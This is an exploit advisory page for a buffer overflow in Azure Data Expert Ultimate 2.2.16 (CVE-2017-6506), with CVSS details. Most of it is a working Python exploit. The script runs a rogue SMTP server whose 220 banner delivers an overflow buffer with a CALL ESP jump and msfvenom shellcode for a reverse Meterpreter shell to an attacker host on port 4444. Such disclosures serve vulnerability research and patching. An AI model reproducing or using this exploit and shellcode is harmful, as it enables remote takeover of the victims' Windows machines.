Azure Data Expert Ultimate 2.2.16 Buffer Overflow

2017.03.09
Credit: Peter Baris
Risk: High
Local: Yes
Remote: No
CVE: CVE-2017-6506
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow # Date: 2017-03-07 # Exploit Author: Peter Baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: http://www.azuredex.com/downloads.html # Version: 2.2.16 # Tested on: Windows Server 2008 R2 Standard x64 # CVE : CVE-2017-6506 # The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts. import socket # QtGui4.dll 0x6527635E - CALL ESP jmp = "\x5e\x63\x27\x65" nops = "\x90"*8 # reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d" "\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e" "\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5" "\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec" "\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94" "\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde" "\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a" "\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75" "\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94" "\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68" "\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff" "\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c" "\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a" "\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7" "\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87" "\xc1\x48\x45\x0e\x32\x6b\x4c") rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63" "\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49" "\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87" "\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd" "\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb" "\xe2\x79\xdc\x2d\x97\x97") buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1 port = 25 s = socket.socket() ip = '0.0.0.0' s.bind((ip, port)) s.listen(5) print 'Listening on SMTP port: '+str(port) if len(rev_met_1) >= 236: print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.') exit(1) elif len(rev_met_2) >= 76: print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.') exit(1) while True: conn, addr = s.accept() conn.send('220 '+buffer+'\r\n') conn.close()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top